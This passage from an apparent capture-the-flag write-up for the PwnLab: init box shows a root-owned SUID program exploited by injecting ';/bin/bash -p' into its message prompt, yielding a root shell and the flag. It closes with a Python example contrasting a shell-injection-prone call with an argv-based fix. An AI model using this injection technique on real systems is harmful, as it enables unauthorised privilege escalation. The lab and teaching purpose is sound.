-rwsr-sr-x 1 root root 5364 Mar 17 2016 msg2root
-rw-r--r-- 1 mike mike 675 Mar 17 2016 .profile
  • Another SUID/SGID executable, this time owned by root.
  • Run it:
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: xixihaha
xixihaha
xixihaha
mike@pwnlab:/home/mike$
  • It looks like a leave-a-message program. It cannot literally be a shell script, since Linux ignores the setuid bit on interpreted scripts and the euid=0 result below shows the bit taking effect, but its behaviour matches a compiled wrapper that builds a shell command from the input, roughly:
#!/bin/bash

read -p 'Message for root:' result
echo $result
  • Try chaining a command with ; (bash -p is required: without it bash drops the root effective uid back to the real uid on startup):
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: xixi;/bin/bash -p
xixi;/bin/bash -p
xixi
bash-4.3# id
id
uid=1002(mike) gid=1002(mike) euid=0(root) egid=0(root) groups=0(root),1003(kane)
  • Root obtained. Read the flag:

Note: cat misbehaves here because the fake /home/kane/cat is still first in PATH (the mike and root shells inherited kane's PATH); /bin/cat flag.txt or resetting PATH would work, but less does the job.

bash-4.3# less flag.txt
less flag.txt
WARNING: terminal is not fully functional
flag.txt (press RETURN)
.-=~=-. .-=~=-.
(__ _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__ _)
(_ ___) _____ _ (_ ___)
(__ _) / __ \ | | (__ _)
( _ __) | / \/ ___ _ __ __ _ _ __ __ _| |_ ___ ( _ __)
(__ _) | | / _ \| '_ \ / _` | '__/ _` | __/ __| (__ _)
(_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \ (_ ___)
(__ _) \____/\___/|_| |_|\__, |_| \__,_|\__|___/ (__ _)
( _ __) __/ | ( _ __)
(__ _) |___/ (__ _)
(__ _) (__ _)
(_ ___) If you are reading this, means that you have break 'init' (_ ___)
( _ __) Pwnlab. I hope you enjoyed and thanks for your time doing ( _ __)
(__ _) this challenge. (__ _)
(_ ___) (_ ___)
( _ __) Please send me your feedback or your writeup, I will love ( _ __)
(__ _) reading it (__ _)
(__ _) (__ _)
(__ _) For sniferl4bs.com (__ _)
( _ __) claor@PwnLab.net - @Chronicoder ( _ __)
(__ _) (__ _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-' `-._.-'
flag.txt (END)
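  • The msg2root command injection, modelled as an added example (not the box's msg2root source, which the write-up never obtains): vulnerable_msg2root() splices the message into a shell command string the way the observed behaviour implies, safe_msg2root() shows the argv-based fix, and demo() feeds the same injected message to both and reports what each did. It assumes a POSIX /bin/sh and /bin/echo and runs unprivileged in a temp directory.

```python
"""Added example: shell command injection in a message-logging helper."""
import os
import shutil
import subprocess
import tempfile


def vulnerable_msg2root(msg: str, logfile: str) -> int:
    """Like system("/bin/echo <msg> >> file"): ';', '|', '$(...)' in msg are
    parsed by the shell. Returns the shell's exit status."""
    return subprocess.run(f"/bin/echo {msg} >> {logfile}", shell=True).returncode


def safe_msg2root(msg: str, logfile: str) -> int:
    """No shell at all: msg is one argv element and the file is opened by us,
    so metacharacters are just bytes. Returns /bin/echo's exit status."""
    with open(logfile, "a") as f:
        return subprocess.run(["/bin/echo", msg], stdout=f).returncode


def demo(injected: str = "hi; exit 7") -> dict:
    """The write-up typed xixi;/bin/bash -p; '; exit 7' is the harmless
    equivalent: a second command whose effect (the exit status) is visible."""
    work = tempfile.mkdtemp(prefix="msg2root")
    try:
        log = os.path.join(work, "messages.txt")
        result = {"vuln_rc": vulnerable_msg2root(injected, log),
                  "safe_rc": safe_msg2root(injected, log)}
        with open(log) as f:
            result["logged"] = f.read().splitlines()   # only the safe call logs it
        return result
    finally:
        shutil.rmtree(work)


if __name__ == "__main__":
    print(demo())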